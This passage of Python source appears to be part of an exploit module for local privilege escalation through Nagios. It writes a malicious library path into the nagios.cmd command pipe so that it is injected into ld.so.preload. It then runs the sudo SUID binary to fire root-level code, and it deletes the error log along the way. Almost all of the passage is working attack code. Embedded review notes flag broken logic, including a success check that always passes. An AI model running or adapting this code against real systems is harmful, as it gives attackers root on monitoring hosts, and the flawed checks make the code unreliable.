        nagios_process = Popen("ps aux | grep -v grep | grep -i 'bin/nagios'",
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               shell=True).communicate()[0]
        if nagios_process != None and nagios_process.decode('utf-8') != "":
            self.print_info("Nagios stopped. Shouldn't take long now... ;)")
    # Poll once per second, then remove the log symlink and stop waiting.
    while True:
        sleep(1)
        # NOTE(review): this exits the loop when the preload file does NOT
        # exist (i.e. immediately, given the safety check above) — confirm
        # the intended polarity of this condition.
        if not self.check_file_exists(self.preload_file_name):
            error_log = self.options["nagios_error_log"][1]
            subprocess.run(["rm", "-f", str(error_log)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
            break
    preload_privileges = Popen("ls -l " + self.preload_file_name,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               shell=True).communicate()[0]
    self.print_info("Nagios restarted. The " + self.preload_file_name +
                    " file got created with the privileges: \n" +
                    preload_privileges.decode('utf-8'))
    sleep(3)
    # Wait for Nagios to create the nagios.cmd pipe
    is_pipe = stat.S_ISFIFO(os.stat(self.commandfile).st_mode)
    if not is_pipe:
        self.print_warn("Nagios command pipe " + self.commandfile +
                        " does not exist!")
        sys.exit(2)
    self.print_info(
        "Injecting " + self.PRIVESCLIB +
        " via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload"
    )
    # Timestamped external-command entry written into the command pipe.
    now = calendar.timegm(time.gmtime())
    command = "/usr/bin/printf \\\"[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; " + self.PRIVESCLIB + "\\\n\\\" " + str(
        now) + " > " + self.commandfile
    stdout, stderr = Popen(command,
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE,
                           shell=True).communicate()
    sleep(1)
    # NOTE(review): grep -q never writes to stdout, so this captured output
    # is empty regardless of a match; the success branch below is therefore
    # always taken — confirm the intended check.
    stdout = Popen("grep -q " + self.PRIVESCLIB + " " +
                   self.preload_file_name,
                   stdout=subprocess.PIPE,
                   stderr=subprocess.PIPE,
                   shell=True).communicate()[0]
    if stdout == None or stdout.decode('utf-8').strip() == "":
        result = Popen("cat " + self.preload_file_name + " | grep \"" +
                       self.PRIVESCLIB + "\"",
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE,
                       shell=True).communicate()
        self.print_info("The " + self.preload_file_name +
                        " file now contains: \n" +
                        result[0].decode('utf-8'))
    else:
        self.print_warn("Unable to inject the lib to " +
                        self.preload_file_name)
        sys.exit(2)
    self.print_info("Triggering privesc code from " + self.PRIVESCLIB +
                    " by executing " + self.SUIDBIN + " SUID binary")
    Popen("sudo 2>/dev/null >/dev/null",
          stdout=subprocess.PIPE,
          stderr=subprocess.PIPE,
          shell=True).communicate()